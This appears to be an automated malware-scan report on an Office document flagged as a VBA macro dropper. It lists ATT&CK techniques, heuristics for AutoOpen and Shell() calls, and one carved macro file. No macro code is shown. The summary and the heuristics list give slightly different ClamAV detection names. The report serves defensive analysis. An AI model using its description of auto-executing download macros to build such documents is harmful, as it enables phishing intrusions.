Verdict: MALICIOUS (Risk Score: 242)
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute external code. The ClamAV detection name 'Doc.Dropper.Agent-6591766-0' further supports its nature as a dropper. The macro's obfuscated string concatenation suggests it's constructing a command to download and execute a payload.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6591567-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6591567-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11872 bytes |

SHA-256: a738b5486abefdb1891f87f9d1eb9bcd5d29886a36e1487ed91a81db21580b30

Preview script: first 1,000 lines of the extracted script.